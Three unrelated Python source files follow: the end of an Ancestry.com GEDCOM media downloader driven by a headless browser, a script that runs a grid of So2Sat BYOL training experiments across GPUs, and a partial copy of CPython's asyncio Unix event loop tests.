image_name = "{0}/{1}".format(image_dir, base_name)
file_name, file_hash, duplicate = get_image(session, image_link, image_name)
if file_name:
guid_data.update({"image": file_name, "hash": file_hash})
guid_data.update(process_url_note(session, url_note))
with open(guid_meta_file, "w") as meta_file:
meta_file.write(toml.dumps(guid_data))
meta_file.flush()
item_process_time = pendulum.now() - item_start_time
logging.info("Item processing time %d seconds", item_process_time.seconds)
if duplicate:
return "duplicate"
return "success"
return "unavailable"
def main():
"""
Main program
"""
for signal_type in [SIGTERM, SIGABRT]:
signal(signal_type, clean_exit)
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--account", help="Account name")
parser.add_argument("-c", "--config", help="Configuration file")
parser.add_argument(
"-C",
"--citations",
default=True,
action="store_true",
help="Save source images for citations",
)
parser.add_argument(
"-g",
"--gedcom",
help="Gedcom file",
)
parser.add_argument(
"-i",
"--ignore",
default=False,
action="store_true",
help="Ignore previously unavailable APID entries",
)
parser.add_argument(
"-M",
"--media",
default=True,
action="store_true",
help="Save user media images",
)
parser.add_argument(
"-N",
"--newspapers",
default=False,
action="store_true",
help="Save clipped newspaper images",
)
parser.add_argument("-o", "--output", help="Root of output directory structure")
parser.add_argument("-p", "--password", help="Password")
parser.add_argument(
"-r",
"--resume",
default=False,
action="store_true",
help="Resume if prior state found",
)
parser.add_argument(
"-S",
"--screenshots",
default=False,
action="store_true",
help="Save source citation screenshots",
)
parser.add_argument(
"-u",
"--url",
dest="ancestry",
default="https://www.ancestry.com",
help="Override default https://www.ancestry.com",
)
args = parser.parse_args()
if not args.account or not args.password or not args.gedcom:
if not args.config:
args.config = "ancestry_extract.toml"
if args.config:
if os.path.isfile(args.config):
with open(args.config, "r") as config_file:
config_data = toml.load(config_file)
for key in config_data:
setattr(args, key, config_data[key])
if not args.account or not args.password or not args.gedcom:
print("Account name, password, and gedcom file are required arguments")
sys.exit(1)
if not os.path.isfile(args.gedcom):
print("Gedcom file not found")
sys.exit(1)
with open(args.gedcom, "r") as gedcom:
gedcom_data = gedcom.read()
if (
"1 SOUR Ancestry.com Family Trees" not in gedcom_data
or "2 CORP Ancestry.com" not in gedcom_data
):
print("Gedcom file does not appear to be from Ancestry.com")
sys.exit(1)
for check_dir in [
"/logs",
"/media/dbid",
"/media/apid",
"/metadata/guid",
"/metadata/apid",
"/metadata/dbid",
]:
if not os.path.isdir(args.output + check_dir):
os.makedirs(args.output + check_dir)
log_file = (
args.output
+ "/logs/"
+ pendulum.now().format("YYYY-MM-DD-HH-MM")
+ "-ancestry-extract.log"
)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(name)-8s %(levelname)-8s %(message)s",
filename=log_file,
filemode="a",
)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(message)s")
console.setFormatter(formatter)
logging.getLogger("").addHandler(console)
if args.config:
logging.info("Config File: " + args.config)
logging.info("Gedcom File: " + args.gedcom)
logging.info("Output Tree: " + args.output)
logging.info("Save Citation Images: " + str(args.citations))
logging.info("Save Citation Screenshots: " + str(args.screenshots))
logging.info("Save User Media: " + str(args.media))
logging.info("Save News Clippings: " + str(args.newspapers))
gedcom_queue = Queue()
gedcom_process = Process(target=load_gedcom, args=(gedcom_queue, gedcom_data))
gedcom_process.start()
cache_queue = Queue()
cache_process = Process(target=load_tables, args=(cache_queue, args.output))
cache_process.start()
logging.info("Launching browser")
firefox_profile = FirefoxProfile()
firefox_profile.set_preference("browser.startup.homepage", "about:blank")
firefox_profile.set_preference("browser.download.folderList", 2)
firefox_profile.set_preference("browser.download.panel.shown", False)
firefox_profile.set_preference("browser.download.manager.showWhenStarting", False)
firefox_profile.set_preference("browser.download.dir", args.output)
firefox_profile.set_preference(
"browser.helperApps.neverAsk.saveToDisk", "application/octet-stream"
)
firefox_profile.set_preference("places.history.enabled", False)
firefox_options = Options()
firefox_options.headless = True
session = Firefox(options=firefox_options, firefox_profile=firefox_profile)
atexit.register(session_cleanup, session)
session.implicitly_wait(15)
session.fullscreen_window()
session.options = args
login(session)
result = cache_queue.get()
session.checkpoint = result["checkpoint"]
session.tree_id = result["tree_id"]
session.tree_name = result["tree_name"]
session.unavailable = []
if args.resume or args.ignore:
session.unavailable = result["unavailable"]
session.hash_map = result["hash_map"]
session.images = result["image_cache"]
cache_process.join()
result = gedcom_queue.get()
people = result["people"]
people_total = len(people)
family_total = result["families"]
apid_total = result["apid_total"]
apid_unique = result["apid_unique"]
guid_total = result["guid_total"]
guid_unique = result["guid_unique"]
gedcom_process.join()
logging.info(
"Found %d people and %d families to process", people_total, family_total
)
logging.info(
"Found %d unique and %d total ancestry citations to process",
apid_unique,
apid_total,
)
logging.info(
"Found %d unique and %d total user media items to process",
guid_unique,
guid_total,
)
print_flag = False
session.line_number = 0
success = unavailable = duplicate = skip = timeouts = total = count = 0
person_number = family_number = 0
apid_number = guid_number = 0
person = husband = wife = ""
url_note = ""
logging.info("Starting second pass Gedcom processing")
for line in gedcom_data.split("\n"):
session.line_number = session.line_number + 1
if args.resume and session.line_number < session.checkpoint:
continue
args.resume = False
if len(line) < 5:
continue
if line[0] == "1":
# reset the url note for new records
url_note = ""
tag = line.split(" ")[1]
if tag == "SOUR":
if session.line_number > session.checkpoint:
session.checkpoint = session.line_number
continue
if "@P" in tag:
person_number = person_number + 1
husband = wife = ""
person = people[tag]
print_flag = False
continue
if "@F" in tag:
family_number = family_number + 1
husband = wife = person = ""
print_flag = False
continue
if tag == "HUSB":
husband = people[line[7:]]
continue
if tag == "WIFE":
wife = people[line[7:]]
continue
if tag == "NOTE":
if "http" in line:
url_note = line[7:]
continue
if tag in ["FILE", "_APID"]:
total = total + 1
if not print_flag:
if session.line_number > session.checkpoint:
if person:
logging.info(
"Processing records for person %s (%d of %d)",
person,
person_number,
people_total,
)
else:
who = join = ""
if husband != "":
who = husband
join = " and "
if wife != "":
who = who + join + wife
logging.info(
"Processing records for family of %s (%d of %d)",
who,
family_number,
family_total,
)
print_flag = True
if args.media and " FILE " in line and "f=image&guid=" in line:
guid_number = guid_number + 1
logging.debug(
"User media item %d of %d with %d unique",
guid_number,
guid_total,
guid_unique,
)
result = get_user_media(session, line, url_note)
url_note = ""
if args.citations and " _APID " in line:
process_apid = True
if args.ignore:
apid = line.split(" ").pop(2).strip()
if apid in session.unavailable:
process_apid = False
result = "unavailable"
if process_apid:
apid_number = apid_number + 1
if "::0" not in line:
logging.debug(
"Source citation media item %d of %d with %d unique",
apid_number,
apid_total,
apid_unique,
)
result = get_citation_media(session, line)
if result == "success":
count = count + 1
success = success + 1
elif result == "duplicate":
duplicate = duplicate + 1
elif result == "unavailable":
if person:
logging.info("Unavailable item for %s", person)
else:
logging.info("Unavailable item for %s / %s", husband, wife)
unavailable = unavailable + 1
elif result == "timeout":
timeouts = timeouts + 1
elif result == "skip":
skip = skip + 1
logging.info("Total overall records: %d", total)
logging.info("Total processed records: %d", success)
logging.info("Total duplicate records: %d", duplicate)
logging.info("Total unavailable records: %d", unavailable)
logging.info("Total skipped due to unavailable: %d", skip)
logging.info("Total skipped due to timeouts: %d", timeouts)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
logging.info("Starting application shutdown")
sys.exit(1)
sys.exit(0)
|
run_so2sat_byol_experiments.py
|
#!/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Runs the train script with a grid of hyperparameters."""
import itertools
import os
import subprocess
from multiprocessing import Process, Queue
from typing import List
# list of GPU IDs that we want to use, one job will be started for every ID in the list
GPUS = [0, 1, 2, 3, 3]
DRY_RUN = False  # if True then only print the commands that would be run, if False then actually run them
DATA_DIR = "" # path to the So2Sat data directory
# Hyperparameter options
model_options = ["resnet50"]
lr_options = [1e-4]
loss_options = ["ce"]
weight_options: List[str] = [] # set paths to checkpoint files
bands_options = ["s2"]
def do_work(work: "Queue[str]", gpu_idx: int) -> bool:
"""Process for each ID in GPUS."""
while not work.empty():
experiment = work.get()
experiment = experiment.replace("GPU", str(gpu_idx))
print(experiment)
if not DRY_RUN:
subprocess.call(experiment.split(" "))
return True
if __name__ == "__main__":
work: "Queue[str]" = Queue()
for (model, lr, loss, weights, bands) in itertools.product(
model_options, lr_options, loss_options, weight_options, bands_options
):
experiment_name = f"{model}_{lr}_{loss}_byol_{bands}-{weights.split('/')[-2]}"
output_dir = os.path.join("output", "so2sat_experiments")
log_dir = os.path.join(output_dir, "logs")
config_file = os.path.join("conf", "so2sat.yaml")
if not os.path.exists(os.path.join(output_dir, experiment_name)):
command = (
"python train.py"
+ f" config_file={config_file}"
+ f" experiment.name={experiment_name}"
+ f" experiment.module.classification_model={model}"
+ f" experiment.module.learning_rate={lr}"
+ f" experiment.module.loss={loss}"
+ f" experiment.module.weights={weights}"
+ " experiment.module.in_channels=10"
+ f" experiment.datamodule.bands={bands}"
+ f" program.output_dir={output_dir}"
+ f" program.log_dir={log_dir}"
+ f" program.data_dir={DATA_DIR}"
+ " trainer.gpus=[GPU]"
)
command = command.strip()
work.put(command)
processes = []
for gpu_idx in GPUS:
p = Process(target=do_work, args=(work, gpu_idx))
processes.append(p)
p.start()
for p in processes:
p.join()
|
test_unix_events.py
|
"""Tests for unix_events.py."""
import collections
import contextlib
import errno
import io
import os
import pathlib
import signal
import socket
import stat
import sys
import tempfile
import threading
import unittest
from unittest import mock
from test import support
if sys.platform == 'win32':
raise unittest.SkipTest('UNIX only')
import asyncio
from asyncio import log
from asyncio import base_events
from asyncio import events
from asyncio import unix_events
from test.test_asyncio import utils as test_utils
MOCK_ANY = mock.ANY
def tearDownModule():
asyncio.set_event_loop_policy(None)
def close_pipe_transport(transport):
# Don't call transport.close() because the event loop and the selector
# are mocked
if transport._pipe is None:
return
transport._pipe.close()
transport._pipe = None
@unittest.skipUnless(signal, 'Signals are not supported')
class SelectorEventLoopSignalTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
def test_check_signal(self):
self.assertRaises(
TypeError, self.loop._check_signal, '1')
self.assertRaises(
ValueError, self.loop._check_signal, signal.NSIG + 1)
def test_handle_signal_no_handler(self):
self.loop._handle_signal(signal.NSIG + 1)
def test_handle_signal_cancelled_handler(self):
h = asyncio.Handle(mock.Mock(), (),
loop=mock.Mock())
h.cancel()
self.loop._signal_handlers[signal.NSIG + 1] = h
self.loop.remove_signal_handler = mock.Mock()
self.loop._handle_signal(signal.NSIG + 1)
self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_setup_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
m_signal.set_wakeup_fd.side_effect = ValueError
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_coroutine_error(self, m_signal):
m_signal.NSIG = signal.NSIG
async def simple_coroutine():
pass
# callback must not be a coroutine function
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
self.assertRaisesRegex(
TypeError, 'coroutines cannot be used with add_signal_handler',
self.loop.add_signal_handler,
signal.SIGINT, func)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
cb = lambda: True
self.loop.add_signal_handler(signal.SIGHUP, cb)
h = self.loop._signal_handlers.get(signal.SIGHUP)
self.assertIsInstance(h, asyncio.Handle)
self.assertEqual(h._callback, cb)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_install_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
def set_wakeup_fd(fd):
if fd == -1:
raise ValueError()
m_signal.set_wakeup_fd = set_wakeup_fd
class Err(OSError):
errno = errno.EFAULT
m_signal.signal.side_effect = Err
self.assertRaises(
Err,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error2(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.loop._signal_handlers[signal.SIGHUP] = lambda: True
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(1, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error3(self, m_logging, m_signal):
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(2, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGHUP))
self.assertTrue(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.SIGINT = signal.SIGINT
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGINT, lambda: True)
self.loop._signal_handlers[signal.SIGHUP] = object()
m_signal.set_wakeup_fd.reset_mock()
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGINT))
self.assertFalse(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGINT, m_signal.default_int_handler),
m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.set_wakeup_fd.side_effect = ValueError
self.loop.remove_signal_handler(signal.SIGHUP)
self.assertTrue(m_logging.info)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.signal.side_effect = OSError
self.assertRaises(
OSError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.assertRaises(
RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_close(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.loop.add_signal_handler(signal.SIGCHLD, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 2)
m_signal.set_wakeup_fd.reset_mock()
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
m_signal.set_wakeup_fd.assert_called_once_with(-1)
@mock.patch('asyncio.unix_events.sys')
@mock.patch('asyncio.unix_events.signal')
def test_close_on_finalizing(self, m_signal, m_sys):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 1)
m_sys.is_finalizing.return_value = True
m_signal.signal.reset_mock()
with self.assertWarnsRegex(ResourceWarning,
"skipping signal handlers removal"):
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
self.assertFalse(m_signal.signal.called)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'),
'UNIX Sockets are not supported')
class SelectorEventLoopUnixSocketTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@support.skip_unless_bind_unix_socket
def test_create_unix_server_existing_path_sock(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX)
sock.bind(path)
sock.listen(1)
sock.close()
coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@support.skip_unless_bind_unix_socket
def test_create_unix_server_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
srv_coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(srv_coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_create_unix_connection_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
coro = self.loop.create_unix_connection(lambda: None, path)
with self.assertRaises(FileNotFoundError):
# If pathlib.Path wasn't supported, the exception would be
# different.
self.loop.run_until_complete(coro)
def test_create_unix_server_existing_path_nonsock(self):
with tempfile.NamedTemporaryFile() as file:
coro = self.loop.create_unix_server(lambda: None, file.name)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_ssl_bool(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl=True)
with self.assertRaisesRegex(TypeError,
'ssl argument must be an SSLContext'):
self.loop.run_until_complete(coro)
def test_create_unix_server_nopath_nosock(self):
coro = self.loop.create_unix_server(lambda: None, path=None)
with self.assertRaisesRegex(ValueError,
'path was not specified, and no sock'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_dgram(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
@support.skip_unless_bind_unix_socket
def test_create_unix_server_path_stream_bittype(self):
sock = socket.socket(
socket.AF_UNIX, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with tempfile.NamedTemporaryFile() as file:
fn = file.name
try:
with sock:
sock.bind(fn)
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
finally:
os.unlink(fn)
def test_create_unix_server_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_connection(lambda: None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.unix_events.socket')
def test_create_unix_server_bind_error(self, m_socket):
# Ensure that the socket is closed on any bind error
sock = mock.Mock()
m_socket.socket.return_value = sock
sock.bind.side_effect = OSError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
sock.bind.side_effect = MemoryError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(MemoryError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_unix_connection_path_sock(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, sock=object())
with self.assertRaisesRegex(ValueError, 'path and sock can not be'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nopath_nosock(self):
coro = self.loop.create_unix_connection(
lambda: None, None)
with self.assertRaisesRegex(ValueError,
'no path and sock were specified'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_nossl_serverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, server_hostname='spam')
with self.assertRaisesRegex(ValueError,
'server_hostname is only meaningful'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_noserverhost(self):
coro = self.loop.create_unix_connection(
lambda: None, os.devnull, ssl=True)
with self.assertRaisesRegex(
ValueError, 'you have to pass server_hostname when using ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_connection(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(os, 'sendfile'),
'sendfile is not supported')
class SelectorEventLoopUnixSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
self._ready = loop.create_future()
def connection_made(self, transport):
self.started = True
self.transport = transport
self._ready.set_result(None)
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, cleanup=True):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
if cleanup:
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
port = support.find_unused_port()
srv_sock = self.make_socket(cleanup=False)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: proto, sock=srv_sock))
self.run_loop(self.loop.sock_connect(sock, (support.HOST, port)))
self.run_loop(proto._ready)
def cleanup():
proto.transport.close()
self.run_loop(proto.wait_closed())
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test_sock_sendfile_not_available(self):
sock, proto = self.prepare()
with mock.patch('asyncio.unix_events.os', spec=[]):
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"os[.]sendfile[(][)] is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_a_file(self):
sock, proto = self.prepare()
f = object()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_iobuffer(self):
sock, proto = self.prepare()
f = io.BytesIO()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_not_regular_file(self):
sock, proto = self.prepare()
f = mock.Mock()
f.fileno.return_value = -1
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"not a regular file"):
self.run_loop(self.loop._sock_sendfile_native(sock, f,
0, None))
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_cancel1(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
with contextlib.suppress(asyncio.CancelledError):
self.run_loop(fut)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_cancel2(self):
sock, proto = self.prepare()
fut = self.loop.create_future()
fileno = self.file.fileno()
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
fut.cancel()
self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
def test_sock_sendfile_blocking_error(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = mock.Mock()
fut.cancelled.return_value = False
with mock.patch('os.sendfile', side_effect=BlockingIOError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
key = self.loop._selector.get_key(sock)
self.assertIsNotNone(key)
fut.add_done_callback.assert_called_once_with(mock.ANY)
def test_sock_sendfile_os_error_first_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
with mock.patch('os.sendfile', side_effect=OSError()):
self.loop._sock_sendfile_native_impl(fut, None, sock, fileno,
0, None, len(self.DATA), 0)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIsInstance(exc, asyncio.SendfileNotAvailableError)
self.assertEqual(0, self.file.tell())
def test_sock_sendfile_os_error_next_call(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = OSError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
def test_sock_sendfile_exception(self):
sock, proto = self.prepare()
fileno = self.file.fileno()
fut = self.loop.create_future()
err = asyncio.SendfileNotAvailableError()
with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
class UnixReadPipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.Protocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFIFO
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def read_pipe_transport(self, waiter=None):
transport = unix_events._UnixReadPipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = asyncio.Future(loop=self.loop)
tr = self.read_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertIsNone(waiter.result())
@mock.patch('os.read')
def test__read_ready(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b'data'
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.protocol.data_received.assert_called_with(b'data')
@mock.patch('os.read')
def test__read_ready_eof(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b''
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.eof_received.assert_called_with()
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.read')
def test__read_ready_blocked(self, m_read):
tr = self.read_pipe_transport()
m_read.side_effect = BlockingIOError
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
test_utils.run_briefly(self.loop)
self.assertFalse(self.protocol.data_received.called)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.read')
def test__read_ready_error(self, m_read, m_logexc):
tr = self.read_pipe_transport()
err = OSError()
m_read.side_effect = err
tr._close = mock.Mock()
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
tr._close.assert_called_with(err)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal read error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
@mock.patch('os.read')
def test_pause_reading(self, m_read):
tr = self.read_pipe_transport()
m = mock.Mock()
self.loop.add_reader(5, m)
tr.pause_reading()
self.assertFalse(self.loop.readers)
@mock.patch('os.read')
def test_resume_reading(self, m_read):
tr = self.read_pipe_transport()
tr.resume_reading()
self.loop.assert_reader(5, tr._read_ready)
@mock.patch('os.read')
def test_close(self, m_read):
tr = self.read_pipe_transport()
tr._close = mock.Mock()
tr.close()
tr._close.assert_called_with(None)
@mock.patch('os.read')
def test_close_already_closing(self, m_read):
tr = self.read_pipe_transport()
tr._closing = True
tr._close = mock.Mock()
tr.close()
self.assertFalse(tr._close.called)
@mock.patch('os.read')
def test__close(self, m_read):
